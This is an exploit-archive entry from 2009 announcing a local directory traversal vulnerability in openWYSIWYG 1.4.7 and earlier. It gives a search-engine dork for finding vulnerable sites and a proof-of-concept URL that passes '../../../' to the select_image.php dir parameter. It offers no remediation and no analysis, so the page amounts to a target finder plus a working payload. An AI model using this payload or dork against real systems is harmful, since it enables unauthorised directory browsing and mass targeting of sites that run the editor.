[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : openWYSIWYG <= 1.4.7 Local Directory Transversal Vulnerability
# Published : 2009-05-11
# Author : StAkeR
# Previous Title : eggBlog <= 4.1.1 Local Directory Transversal Exploit
# Next Title : microTopic v1 (rating) Remote Blind SQL Injection Exploit


[--- openWYSIWYG <= 1.4.7 Local Directory Transversal Vulnerability ---]

[-- Discovered by Juri Gianni aka yeat - staker[at]hotmail[dot]it --]
[-- Visit http://zeroidentity.org --]
[-- allinurl: addons/imagelibrary/select_image.php --]

http://[target]/[path]/addons/imagelibrary/select_image.php?dir=../../../

# www.Syue.com [2009-05-11]